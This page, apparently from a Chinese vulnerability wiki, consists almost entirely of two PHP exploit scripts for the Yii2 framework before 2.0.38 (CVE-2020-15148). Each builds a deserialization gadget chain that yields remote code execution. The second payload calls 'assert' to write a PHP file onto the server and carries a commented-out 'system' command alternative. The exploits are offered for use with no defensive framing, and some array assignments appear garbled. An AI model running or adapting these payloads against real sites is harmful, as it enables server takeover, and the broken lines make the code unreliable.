免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
INFO
Yii2 <2.0.38
EXP
<?php
namespace yii\rest {
class Action extends \yii\base\Action
{
public $checkAccess;
}
class IndexAction extends Action
{
public function __construct($func, $param)
{
$this->checkAccess = $func;
$this->id = $param;
}
}
}
namespace yii\web {
abstract class MultiFieldSession
{
public $writeCallback;
}
class DbSession extends MultiFieldSession
{
public function __construct($func, $param)
{
$this->writeCallback = new \yii\rest\IndexAction($func, $param), "run";
}
}
}
namespace yii\base {
class BaseObject
{
//
}
class Action
{
public $id;
}
}
namespace yii\db {
use yii\base\BaseObject;
class BatchQueryResult extends BaseObject
{
private $_dataReader;
public function __construct($func, $param)
{
$this->_dataReader = new \yii\web\DbSession($func, $param);
}
}
}
$exp = new \yii\db\BatchQueryResult($func, $param);
print(serialize($exp));
EXP 2
来源:CVE-2020-15148 Yii2反序列化RCE POP链分析
<?php
namespace yii\rest{
class CreateAction{
public $checkAccess;
public $id;
public function __construct(){
//$this->checkAccess = 'system';
//$this->id = 'ls -la';
$this->checkAccess = 'assert';
$this->id = 'file_put_contents("i.php","<?php phpinfo()?>")';
}
}
}
namespace Faker{
use yii\rest\CreateAction;
class Generator{
protected $formatters;
public function __construct(){
$this->formatters'close' = new CreateAction, 'run';
}
}
}
namespace yii\db{
use Faker\Generator;
class BatchQueryResult{
private $_dataReader;
public function __construct(){
$this->_dataReader = new Generator;
}
}
}
namespace{
echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>
PWNWIK.COM
